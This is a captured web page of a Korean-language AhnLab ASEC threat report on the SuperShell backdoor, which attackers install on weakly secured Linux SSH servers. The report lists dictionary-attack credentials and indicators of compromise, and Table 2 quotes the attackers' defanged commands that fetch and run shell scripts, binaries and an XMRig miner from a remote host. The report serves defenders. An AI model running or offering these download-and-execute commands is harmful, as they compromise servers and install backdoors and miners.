urlscan.io logo urlscan.io
SecurityTrails logo

asec.ahnlab.com Open in urlscan Pro
192.0.78.137  Public Scan

Back to summary
URL: https://asec.ahnlab.com/ko/83121/
Submission: On September 21 via api from IN — Scanned from DE

Form analysis 2 forms found in the DOM

GET /

<form action="/" method="get" role="search">
  <div class="elementor-search-form__container" style="display: flex; border:none; border-radius: 50px; min-height: 45px; background: #C2C2C217; width: 300px;">
    <label class="elementor-screen-only" for="elementor-search-form-e87db42"></label>
    <input style="font-size: 14px; width: 100%; background: transparent; padding-left: 25px; border:none; border-radius: 50px;" placeholder="보안 키워드를 검색해보세요" class="elementor-search-form__input" type="search" name="s" value="" required="">
    <button class="elementor-search-form__submit" type="submit" aria-label="Search" style="border: none; transform:scale(0.8); padding-right: 1.5rem; background: transparent; margin-left: auto;">
      <div class="header-search-box">
        <a href="#"><i class="icofont-search-1"></i></a>
      </div>
    </button>
  </div>
</form>

GET https://asec.ahnlab.com/ko/

<form role="search" method="get" id="searchform" class="search-form" action="https://asec.ahnlab.com/ko/">
  <div class="form-group">
    <input type="text" class="search-input" value="" name="s" id="s" placeholder="Search....." required="">
  </div>
  <button type="submit" id="searchsubmit" class="search-button submit-btn"><i class="icofont-search-1"></i></button>
</form>

Text Content

MENU
 * 위협 인텔리전스 →
   * 악성코드
   * 다크웹
   * 취약점
   * 피싱/스캠
   * CERT
   * 스미싱
   * EndPoint
   * 모바일
   * Networks
   * APT
   * 트렌드
 * 데일리 위협
 * 보안 권고문
 * RSS
 * Feedly
 * 언어 →
   * 한국어
   * English
   * 日本語

 * 위협 인텔리전스
   * 악성코드
   * 다크웹
   * 취약점
   * 피싱/스캠
   * CERT
   * 스미싱
   * EndPoint
   * 모바일
   * Networks
   * APT
   * 트렌드
 * 데일리 위협
 * 보안 권고문
 * RSS
 * Feedly
 * 언어
   * 한국어
   * English
   * 日本語

한국어
English
日本語
RSS
Feedly



악성코드


리눅스 SSH 서버를 대상으로 유포 중인 SUPERSHELL 악성코드

 * 2024년 09월 11일

AhnLab Security Emergency response Center(ASEC)에서는 최근 부적절하게 관리되고 있는 리눅스 SSH 서버를
대상으로 백도어 악성코드인 SuperShell을 설치하는 공격 사례를 확인하였다. SuperShell은 중국어를 사용하는 개발자에 의해
제작되었으며 Go 언어로 개발되어 윈도우와 리눅스, 안드로이드를 포함한 다양한 플랫폼을 지원한다. 실질적인 기능은 리버스 쉘이며 공격자는 이를
이용해 감염 시스템을 원격에서 제어할 수 있다.

 

Figure 1. Supershell 깃허브 페이지

 

공격자는 다수의 시스템을 감염시킨 후 스캐너를 설치한 것으로 추정되며 다음과 같은 공격지에서 사전 공격을 통해 로그인을 시도하였다. 

 

Attacker IP ID/PW 209.141.60[.]249 root / qwer 179.61.253[.]67 root / password
root / a123456789
root / a1234567
root / newroot
root / 123qaz!@#
root / Passw0rd
root / 123qweASD
root / abc123
root / daniel
root / 1qaz@wsx 107.189.8[.]15 root / doctor 2.58.84[.]90 root / Admin123!
root / 123456qwerty
root / cocacola
root / qweasd!@#

Table 1. 공격지 주소 및 로그인 시도 과정에서 사용된 자격 증명 정보

 

공격에 성공한 후에는 다음과 같은 명령들을 실행해 직접 SuperShell을 설치하거나 다운로더 기능을 담당하는 쉘 스크립트를 설치하였다.
SuperShell은 웹 서버뿐만 아니라 FTP 서버를 통해서도 다운로드되었다.

 

# cd /tmp ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1; rm -r *
# cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
hxxp://45.15.143[.]197/sensi.sh; curl -O hxxp://45.15.143[.]197/sensi.sh; chmod
777 sensi.sh; sh sensi.sh; tftp 45.15.143[.]197 -c get sensi.sh; chmod 777
sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 45.15.143[.]197; chmod 777
sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21
45.15.143[.]197 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh
sensi2.sh sensi1.sh; rm -rf *
# cd /etc ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1 ; wget
hxxp://45.15.143[.]197/x64.bin ; chmod +x x64.bin ; ./x64.bin ; rm -r *
# cd /tmp ; curl hxxp://45.15.143[.]197:44581/ssh1.sh | sh ; wget
hxxp://45.15.143[.]197:44581/ssh1.sh ; sh ssh1.sh ; rm -r *
# cd /tmp ; curl -s -L
hxxps://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.sh |
LC_ALL=en_US.UTF-8 bash -s
871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx
; wget hxxp://45.15.143[.]197:10086/supershell/compile/download/ssh1 ; chmod +x
ssh1 ; ./ssh1 ; rm -r ssh1

Table 2. 공격 사례에서 확인된 명령들

 

최종적으로 설치된 악성코드는 난독화되어 있지만 소수의 내부 문자열들과 동작 방식 그리고 실행 과정에서 확인되는 문자열들을 통해
SuperShell 백도어인 것을 확인할 수 있다.

 

Figure 2. 난독화된 SuperShell

 

Figure 3. SuperShell 실행 로그

 

일반적으로 부적절하게 관리되는 리눅스 시스템들을 대상으로 하는 공격에서는 XMRig와 같은 코인 마이너나 ShellBot, Tsunami와 같은
DDoS Bot이 설치되는 경향이 있다. 이번에 확인된 공격에서 공격자는 제어 탈취를 위한 목적으로 먼저 SuperShell을 설치하였다. 물론
SuperShell과 함께 XMRig 모네로 코인 마이너를 함께 설치하는 사례가 확인되는 것을 보면 최종적인 목적은 가상 화폐를 채굴하는 것으로
보인다.

 

871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx

Table 3. 공격자의 모네로 지갑 주소

 

최근 부적절하게 관리되고 있는 리눅스 SSH 서버를 대상으로 SuperShell 백도어가 설치되고 있다. SuperShell이 설치될 경우
리눅스 서버는 공격자의 명령을 받아 제어를 탈취당할 수 있다.

 

이에 따라 관리자들은 계정의 비밀번호를 추측하기 어려운 형태로 사용하고 주기적으로 변경하여 무차별 대입 공격과 사전 공격으로부터 리눅스 서버를
보호해야 하며, 최신 버전으로 패치하여 취약점 공격을 방지해야 한다. 또한 외부에 공개되어 접근 가능한 서버에 대해 방화벽과 같은 보안 제품을
이용해 공격자로부터의 접근을 통제해야 한다. 마지막으로 V3를 최신 버전으로 업데이트하여 악성코드의 감염을 사전에 차단할 수 있도록 신경 써야
한다.

 

진단명
Backdoor/Linux.CobaltStrike.3753120 (2024.09.11.00)
Downloader/Shell.Agent.SC203780 (2024.09.11.00)
Downloader/Shell.ElfMiner.S1705 (2021.11.29.02)

MD5
4ee4f1e7456bb2b3d13e93797b9efbd3
5ab6e938028e6e9766aa7574928eb062
e06a1ba2f45ba46b892bef017113af09
추가 IoC는 ATIP에서 제공됩니다.
URL
http[:]//45[.]15[.]143[.]197/sensi[.]sh
http[:]//45[.]15[.]143[.]197/ssh1
http[:]//45[.]15[.]143[.]197/x64[.]bin
http[:]//45[.]15[.]143[.]197[:]10086/supershell/compile/download/ssh
http[:]//45[.]15[.]143[.]197[:]44581/ssh1
추가 IoC는 ATIP에서 제공됩니다.
IP
107[.]189[.]8[.]15
179[.]61[.]253[.]67
2[.]58[.]84[.]90
209[.]141[.]60[.]249
45[.]15[.]143[.]197
추가 IoC는 ATIP에서 제공됩니다.

AhnLab TIP를 구독하시면 연관 IOC 및 상세 분석 정보를 추가적으로 확인하실 수 있습니다. 자세한 내용은 아래 배너를 클릭하여
확인해보세요.



TAGS:

backdoor CoinMiner SSH SuperShell XMRig
Previous Post


주간 탐지 룰(YARA, SNORT) 정보 – 2024년 9월 2주차

Next Post


GOTOHTTP를 악용한 MS-SQL 서버 대상 공격 사례